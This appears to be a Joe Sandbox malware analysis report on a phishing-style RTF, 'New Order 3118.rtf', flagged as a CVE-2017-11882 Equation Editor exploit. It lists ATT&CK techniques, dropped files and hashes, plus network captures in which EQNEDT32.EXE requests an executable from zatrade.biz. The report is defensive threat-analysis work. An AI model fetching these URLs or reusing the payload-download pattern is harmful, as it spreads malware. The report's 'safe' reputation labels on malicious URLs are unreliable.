Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 652Thread sleep time: -300000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3284Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts23
Exploitation for Client Execution		1
DLL Side-Loading		1
Process Injection		1
Masquerading		OS Credential Dumping1
Virtualization/Sandbox Evasion		Remote Services1
Archive Collected Data		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Modify Registry		LSASS Memory1
Remote System Discovery		Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager1
File and Directory Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Process Injection		NTDS3
System Information Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Install Root Certificate		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
New Order 3118.rtf37%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
http://ocsp.entrust.net030%URL Reputationsafe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
http://ocsp.entrust.net0D0%URL Reputationsafe
http://zatrade.biz/6nSkW0jqk0%Avira URL Cloudsafe
https://zatrade.biz/6nSkW0jqkE1okon.exe0%Avira URL Cloudsafe
http://zatrade.biz/6nSkW0jqkE1okon.exej0%Avira URL Cloudsafe
http://zatrade.biz/6nSkW0jqkE1okon.exeW0%Avira URL Cloudsafe
https://zatrade.biz/0%Avira URL Cloudsafe
http://zatrade.biz/6nSkW0jqkE1okon.exe0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
zatrade.biz
185.236.228.49
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://zatrade.biz/6nSkW0jqkE1okon.exetrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://zatrade.biz/6nSkW0jqkE1okon.exejEQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    		unknown
    http://crl.entrust.net/server1.crl0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      http://ocsp.entrust.net03EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://zatrade.biz/6nSkW0jqkEQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://zatrade.biz/6nSkW0jqkE1okon.exeEQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.diginotar.nl/cps/pkioverheid0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://zatrade.biz/6nSkW0jqkE1okon.exeWEQNEDT32.EXE, 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://ocsp.entrust.net0DEQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      https://zatrade.biz/EQNEDT32.EXE, 00000002.00000002.340815170.0000000000569000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://secure.comodo.com/CPS0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
        		high
        http://crl.entrust.net/2048ca.crl0EQNEDT32.EXE, 00000002.00000002.340815170.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
          		high

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.236.228.49
          		zatrade.bizPortugal
          		197696EVOLIX-ASFRtrue

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1416057
          Start date and time:2024-03-26 19:44:06 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 3m 58s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:defaultwindowsofficecookbook.jbs
          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
          Number of analysed new started processes analysed:9
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:New Order 3118.rtf
          Detection:MAL
          Classification:mal80.expl.winRTF@3/8@1/1
          EGA Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .rtf
          • Found Word or Excel or PowerPoint or XPS Viewer
          • Attach to Office via COM
          • Active ActiveX Object
          • Scroll down
          • Close Viewer

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
          • Execution Graph export aborted for target EQNEDT32.EXE, PID 1096 because there are no executed function
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • VT rate limit hit for: New Order 3118.rtf

          Simulations

          Behavior and APIs

          TimeTypeDescription
          18:44:49API Interceptor286x Sleep call for process: EQNEDT32.EXE modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.236.228.49New_Order_Inquiry_P.O#20015.pif.exeGet hashmaliciousUnknownBrowse
          • 185.236.228.49/Ioeknkifois.vdf

          Domains

          No context

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          EVOLIX-ASFRMODELO 347.exeGet hashmaliciousRemcosBrowse
          • 185.236.228.203
          THuGg.exeGet hashmaliciousRemcosBrowse
          • 185.236.228.203
          MODELO 347.exeGet hashmaliciousRemcosBrowse
          • 185.236.228.203
          INQUIRY0092709092023.exeGet hashmaliciousAveMaria, UACMeBrowse
          • 185.236.228.161
          xD0aqsLra5.exeGet hashmaliciousLimeRATBrowse
          • 185.236.228.50
          x86.elfGet hashmaliciousUnknownBrowse
          • 185.236.228.164
          5AiPT5XcC5.exeGet hashmaliciousMetasploit, MeterpreterBrowse
          • 185.236.228.215
          New_Order_Inquiry_P.O#20015.pif.exeGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          http://qx1.orgGet hashmaliciousUnknownBrowse
          • 185.236.226.57
          http://qx1.orgGet hashmaliciousUnknownBrowse
          • 185.236.226.57

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          7dcce5b76c8b17472d024758970a406bIncident_Report_Harassment_by_Employee.docGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          #1337.docGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          1.xla.xlsxGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          1.xla.xlsxGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          r29EHJocKX.rtfGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          orden de compra T7849..xla.xlsxGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          orden de compra T7849..xla.xlsxGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          SecuriteInfo.com.Exploit.ShellCode.69.11663.9638.rtfGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          aaaaaa.docx.docGet hashmaliciousUnknownBrowse
          • 185.236.228.49
          APMR1GTlQS.rtfGet hashmaliciousUnknownBrowse
          • 185.236.228.49

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6nSkW0jqkE1okon[1].htm

          Download File
          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          File Type:HTML document, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):162
          Entropy (8bit):4.43530643106624
          Encrypted:false
          SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
          MD5:4F8E702CC244EC5D4DE32740C0ECBD97
          SHA1:3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
          SHA-256:9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
          SHA-512:21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{A05A15F4-C2B5-4B67-9073-F54DC08C2E4B}.tmp

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.0
          Encrypted:false
          SSDEEP:3::
          MD5:CE338FE6899778AACFC28414F2D9498B
          SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
          SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
          SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
          Malicious:false
          Reputation:high, very likely benign file
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{766A1BB3-4D83-4EF3-8227-676B1863F934}.tmp

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.05390218305374581
          Encrypted:false
          SSDEEP:3:ol3lYdn:4Wn
          MD5:5D4D94EE7E06BBB0AF9584119797B23A
          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
          Malicious:false
          Reputation:high, very likely benign file
          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A82DB890-72A8-478E-8686-713EE0E0C1F6}.tmp

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):1024
          Entropy (8bit):0.9254310571932136
          Encrypted:false
          SSDEEP:6:ilHCONgREqAWlgFJkSDlll8vlwvkvjlFwQFrB:t6k5uFJn7uvqcRKQZB
          MD5:F8C0166D302A1D0A40F95AAA5D456796
          SHA1:0AFFC67915CB41CE286E07C15183FA326BFB327E
          SHA-256:E0E50EA32DE39408247FC99446938B03B5EA8C658E7F9EEC901D54D817767DF2
          SHA-512:D4796282AED60E6115E81C52CE76C859FAE84CF83225005338D64F82F1F9EE07F8B97000285E3E361CF38F85035365DDDDE0464B02DA2795C868A83DF01DA427
          Malicious:false
          Reputation:low
          Preview:2.4.1.9.0.3.9.7.{.'.'.'.=......... .E.q.u.a.t.i.o.n...3.E.M.B.E.D..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...............................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ.. .j.D.i...CJ..OJ..QJ..U..^J..aJ.

          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New Order 3118.LNK

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:03 2023, mtime=Fri Aug 11 15:42:03 2023, atime=Mon Mar 25 16:44:48 2024, length=3797, window=hide
          Category:dropped
          Size (bytes):1034
          Entropy (8bit):4.53494103171505
          Encrypted:false
          SSDEEP:12:8l46+i/ctgXg/XAlCPCHaXaMBoB/J89rX+WDz5WlN5TF2icvbptySlXIlTFyDtZb:8mtio/XTKMSc9lz8he/71Dv3qFk7N
          MD5:A171A8B15BCF5ED48A1025820229B047
          SHA1:7DC195FA6702F76E551E65FDD089700A217E93ED
          SHA-256:DC141E49CC8D8732C1511DB1C1C38753762101CF32A4764ABF50EEDAE5E3B8EF
          SHA-512:F80838DF85479C408E52A26BD5441F1AE1F0095D105529ED4513399D31D2BF0838ED25993726D27BC2E35111712B29252A05463AFBC77D49508C9CE25C8A6F89
          Malicious:false
          Reputation:low
          Preview:L..................F.... ...OR..r...OR..r...w..!.~...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....zX....user.8......QK.XzX..*...&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....n.2.....yX.. .NEWORD~1.RTF..R.......WB..WB.*.........................N.e.w. .O.r.d.e.r. .3.1.1.8...r.t.f.......|...............-...8...[............?J......C:\Users\..#...................\\745773\Users.user\Desktop\New Order 3118.rtf.).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w. .O.r.d.e.r. .3.1.1.8...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......745773..........D_....3N...W...9.W.e8...8.....[D_

          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:Generic INItialization configuration [folders]
          Category:dropped
          Size (bytes):63
          Entropy (8bit):4.517372487769167
          Encrypted:false
          SSDEEP:3:HgA/Cm4yCv:HFO
          MD5:5CB4A597993DF92479B9516B6B3BEBB0
          SHA1:7AFE084E9C8A1CE3099F955ACD001A2AA934475C
          SHA-256:FDB9904DDE4384FF9462891A2A341374FAAAA1A12735C1D8A3CCB13AE05576A5
          SHA-512:D44110FB31F949F9DCCD0935E64403D097034E33F826AA0678F6BDA4BD84957F76C8D4ABE1842238BB6D20BB7CD6E656DC7A90039633C6A086022A5956923BC8
          Malicious:false
          Reputation:low
          Preview:[misc]..New Order 3118.LNK=0..[folders]..New Order 3118.LNK=0..

          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.4797606462020307
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

          C:\Users\user\Desktop\~$w Order 3118.rtf

          Download File
          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          File Type:data
          Category:dropped
          Size (bytes):162
          Entropy (8bit):2.4797606462020307
          Encrypted:false
          SSDEEP:3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
          MD5:89AFCB26CA4D4A770472A95DF4A52BA8
          SHA1:C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
          SHA-256:EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
          SHA-512:EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
          Malicious:false
          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

          Static File Info

          General

          File type:Rich Text Format data, version 1
          Entropy (8bit):4.821427895952533
          TrID:
          • Rich Text Format (5005/1) 55.56%
          • Rich Text Format (4004/1) 44.44%
          File name:New Order 3118.rtf
          File size:3'797 bytes
          MD5:99a565b1df705062e82bd4d7587c2959
          SHA1:1817b3ef54cf96f71bbb581ef21c37c820c125f0
          SHA256:e8fac55896700a6e6505cc1b8d4f98570358c0a1275564d587845cfb5ec47068
          SHA512:6893bb6540e7c92cb2d39dae83dd7e16a5ed0cc8bc468e13d65dc1a4e5b909bc9a249b306323167a986ee199b6ff6a9d444b673028e4b92aeb9b0b62607ed15c
          SSDEEP:48:ofay8ypNmpIBWJ993C4hQYqOSRj3jK3Uufl6bc7BsQjtGkCJ6DKNdFlVmo7iC+Op:8ay3NpoBh+Yqz3j0gUDSJIo71tIDocqn
          TLSH:DA715D2B99042D53F983A5F6F58A3C2560F3F96B02CF5E005936F7BA2C27355E026600
          File Content Preview:{\rtf1..{\*\tnUJZMF1qacx5wXPF7Gi9Ek5xIGf1tMvo9y9DxmK4NsFtNgkxl1MTSa79nWc1QLNJ44Pqsc0UoStwLRUkQ1WXgcpZuDUVgK3OQ3FyWXg9ob1lGaGeyYKsLcsDWeQ166b79Co9IK13GcosXwkhLtx0pNv9X5a75RgV9oHtbkgG5nOoZEavQKYUYfcPtn8I29waJ9nkrbJoBOx7mHRM89HqvHbzS6E6Lz3OXVWESfZhShdJYry}..

          File Icon

          Icon Hash:2764a3aaaeb7bdbf

          Static RTF Info

          Objects

          IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
          00000014Bhno

          Network Behavior

          Network Port Distribution

          TCP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 26, 2024 19:44:52.498389006 CET4916580192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.680484056 CET8049165185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:52.680588961 CET4916580192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.680857897 CET4916580192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.860960007 CET8049165185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:52.861654997 CET8049165185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:52.861704111 CET4916580192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.871974945 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.871999979 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:52.872118950 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.881002903 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:52.881012917 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:53.250047922 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:53.250195026 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:53.255448103 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:53.255460978 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:53.255845070 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:53.255896091 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:53.318337917 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:53.336297035 CET44349166185.236.228.49192.168.2.22
          Mar 26, 2024 19:44:53.336354971 CET49166443192.168.2.22185.236.228.49
          Mar 26, 2024 19:44:53.435904980 CET4916580192.168.2.22185.236.228.49

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Mar 26, 2024 19:44:52.289133072 CET5456253192.168.2.228.8.8.8
          Mar 26, 2024 19:44:52.486057043 CET53545628.8.8.8192.168.2.22

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 26, 2024 19:44:52.289133072 CET192.168.2.228.8.8.80xae6fStandard query (0)zatrade.bizA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 26, 2024 19:44:52.486057043 CET8.8.8.8192.168.2.220xae6fNo error (0)zatrade.biz185.236.228.49A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • zatrade.biz

          HTTP Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.2249165185.236.228.49801096C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          TimestampBytes transferredDirectionData
          Mar 26, 2024 19:44:52.680857897 CET317OUTGET /6nSkW0jqkE1okon.exe HTTP/1.1
          Accept: */*
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
          Host: zatrade.biz
          Connection: Keep-Alive
          Mar 26, 2024 19:44:52.861654997 CET369INHTTP/1.1 301 Moved Permanently
          Server: nginx
          Date: Tue, 26 Mar 2024 18:44:52 GMT
          Content-Type: text/html
          Content-Length: 162
          Connection: keep-alive
          Location: https://zatrade.biz/6nSkW0jqkE1okon.exe
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          General

          Target ID:0
          Start time:18:44:48
          Start date:25/03/2024
          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Imagebase:0x13f430000
          File size:1'423'704 bytes
          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          General

          Target ID:2
          Start time:18:44:49
          Start date:25/03/2024
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Imagebase:0x400000
          File size:543'304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          General

          Target ID:5
          Start time:18:45:10
          Start date:25/03/2024
          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
          Wow64 process (32bit):true
          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Imagebase:0x400000
          File size:543'304 bytes
          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Disassembly

          Reset < >

            Non-executed Functions

            Function 0055A7AA Relevance: .3, Instructions: 265COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.340815170.000000000053F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0053F000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_53f000_EQNEDT32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
